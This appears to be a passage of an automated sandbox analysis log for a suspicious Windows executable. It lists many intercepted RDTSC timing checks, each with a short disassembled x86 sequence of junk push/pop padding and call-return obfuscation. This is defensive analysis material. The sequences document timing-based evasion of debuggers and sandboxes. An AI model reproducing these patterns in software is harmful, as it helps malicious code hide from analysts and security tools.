                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8169 second address: BC817B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A91294716h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC817B second address: BC817F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8941 second address: BC89B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F2A91294722h 0x0000000e xchg eax, ebx 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2A91294718h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 18B897F4h 0x0000002e nop 0x0000002f push edx 0x00000030 push ecx 0x00000031 jnc 00007F2A91294716h 0x00000037 pop ecx 0x00000038 pop edx 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F2A91294722h 0x00000040 pushad 0x00000041 jmp 00007F2A9129471Dh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8EA5 second address: BC8EAF instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8EAF second address: BC8EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2A91294716h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 ja 00007F2A91294716h 0x00000018 jmp 00007F2A91294726h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8EDE second address: BC8F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F2A913FCE98h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D228Eh] 0x0000002a push eax 0x0000002b push ecx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC9397 second address: BC939B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC939B second address: BC93F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2A913FCE98h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007F2A913FCEA9h 0x0000002d xchg eax, ebx 0x0000002e jbe 00007F2A913FCE9Eh 0x00000034 push edx 0x00000035 jl 00007F2A913FCE96h 0x0000003b pop edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 pop eax 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC93F5 second address: BC93FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC93FB second address: BC9401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC9401 second address: BC9405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC9BBA second address: BC9BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B7FF9F second address: B7FFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F2A91294716h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007F2A9129471Ah 0x00000016 jmp 00007F2A9129471Eh 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCC264 second address: BCC268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCCD18 second address: BCCD28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A9129471Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCCD28 second address: BCCD86 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2A913FCE98h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 stc 0x0000002a push 00000000h 0x0000002c call 00007F2A913FCEA2h 0x00000031 jno 00007F2A913FCE9Ch 0x00000037 pop edi 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D2D73h], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCCD86 second address: BCCD94 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCECAE second address: BCED01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A913FCEA1h 0x00000008 jng 00007F2A913FCE96h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov esi, 7942FB73h 0x00000019 push 00000000h 0x0000001b jc 00007F2A913FCE96h 0x00000021 mov dword ptr [ebp+122D3854h], ebx 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a mov esi, ecx 0x0000002c pop edi 0x0000002d xchg eax, ebx 0x0000002e push edx 0x0000002f jmp 00007F2A913FCE9Ch 0x00000034 pop edx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 je 00007F2A913FCE96h 0x0000003f pop eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD1B2F second address: BD1B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD1B35 second address: BD1B9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F2A913FCE9Fh 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F2A913FCE98h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jmp 00007F2A913FCE9Bh 0x00000033 push edx 0x00000034 mov esi, edx 0x00000036 pop edi 0x00000037 xchg eax, ebx 0x00000038 jne 00007F2A913FCE9Eh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 js 00007F2A913FCE96h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5B8 second address: BCF5BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD1B9C second address: BD1BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5BD second address: BCF5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnc 00007F2A91294716h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5CF second address: BCF5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5D8 second address: BCF5DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD2412 second address: BD2420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD2685 second address: BD26E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 jo 00007F2A91294719h 0x0000000f mov di, ax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F2A91294718h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e pushad 0x0000002f call 00007F2A91294724h 0x00000034 mov ebx, 119D825Fh 0x00000039 pop ebx 0x0000003a mov cl, 25h 0x0000003c popad 0x0000003d mov esi, dword ptr [ebp+122D3CB5h] 0x00000043 push 00000000h 0x00000045 mov esi, dword ptr [ebp+122D39D9h] 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD2420 second address: BD2424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD434F second address: BD4369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A91294725h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD4369 second address: BD4373 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A913FCEA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD4373 second address: BD4397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2A91294716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F2A91294722h 0x00000013 jnp 00007F2A91294716h 0x00000019 jl 00007F2A91294716h 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD858B second address: BD8598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F2A913FCE96h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDA69F second address: BDA6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDA6A5 second address: BDA6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD87E0 second address: BD87EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F2A91294716h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDA6A9 second address: BDA6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD87EE second address: BD8808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2A91294721h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD8808 second address: BD880F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDAE16 second address: BDAEC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bl, DEh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+12456DA7h], edx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F2A91294718h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov eax, dword ptr [ebp+122D06FDh] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F2A91294718h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000018h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D3989h] 0x00000060 sub dword ptr [ebp+122D1CAEh], ebx 0x00000066 push FFFFFFFFh 0x00000068 movzx edi, si 0x0000006b nop 0x0000006c js 00007F2A9129473Ch 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnp 00007F2A9129471Ch 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDAEC8 second address: BDAECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDCC88 second address: BDCC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDCC8C second address: BDCC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDCC92 second address: BDCC99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD41 second address: BDDD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jns 00007F2A913FCEA0h 0x0000000f nop 0x00000010 call 00007F2A913FCEA7h 0x00000015 mov edi, dword ptr [ebp+122D3AB9h] 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f movsx ebx, si 0x00000022 popad 0x00000023 push 00000000h 0x00000025 or ebx, dword ptr [ebp+122D39B5h] 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD8F second address: BDDD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD93 second address: BDDD99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD99 second address: BDDDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A91294728h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDED13 second address: BDED18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDEF0 second address: BDDEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFCAB second address: BDFCB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDEF5 second address: BDDF14 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A91294722h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFCB1 second address: BDFCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jns 00007F2A913FCE96h 0x0000000f pop edi 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFCC4 second address: BDFD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F2A91294718h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov di, 8664h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F2A91294718h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov bl, ch 0x00000045 or ebx, dword ptr [ebp+122D1D10h] 0x0000004b mov di, 0C2Fh 0x0000004f xchg eax, esi 0x00000050 jnc 00007F2A9129471Ah 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push edi 0x0000005a jbe 00007F2A91294716h 0x00000060 pop edi 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFE8C second address: BDFF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push esi 0x00000007 jmp 00007F2A913FCE9Ch 0x0000000c pop esi 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F2A913FCE98h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F2A913FCE98h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 pushad 0x00000051 mov edx, dword ptr [ebp+122D3B41h] 0x00000057 add esi, dword ptr [ebp+122D3AADh] 0x0000005d popad 0x0000005e mov eax, dword ptr [ebp+122D0025h] 0x00000064 push FFFFFFFFh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push edx 0x0000006b pop edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFF15 second address: BDFF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFF1A second address: BDFF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2A913FCE96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE1A60 second address: BE1A64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE29DA second address: BE29E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6972 second address: BE6976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6976 second address: BE69E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3854h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F2A913FCE98h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c add edi, dword ptr [ebp+122D3C11h] 0x00000032 push 00000000h 0x00000034 call 00007F2A913FCE9Eh 0x00000039 pop ebx 0x0000003a push eax 0x0000003b pushad 0x0000003c jns 00007F2A913FCE98h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F2A913FCEA1h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3C13 second address: BE3C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE4B61 second address: BE4B89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A913FCEA5h 0x00000008 jmp 00007F2A913FCE9Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jbe 00007F2A913FCEA2h 0x00000016 jl 00007F2A913FCE9Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3C19 second address: BE3C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A9129471Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F2A9129471Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE4B89 second address: BE4C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 mov ebx, 5C088229h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov bx, dx 0x00000014 xor ebx, 7928287Ch 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 xor ebx, dword ptr [ebp+122D3972h] 0x00000027 mov eax, dword ptr [ebp+122D11A1h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F2A913FCE98h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D38FFh], esi 0x0000004d push FFFFFFFFh 0x0000004f and ebx, dword ptr [ebp+122D3BC1h] 0x00000055 jmp 00007F2A913FCE9Fh 0x0000005a nop 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 pop edx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 jmp 00007F2A913FCEA4h 0x0000006a pop esi 0x0000006b rdtsc
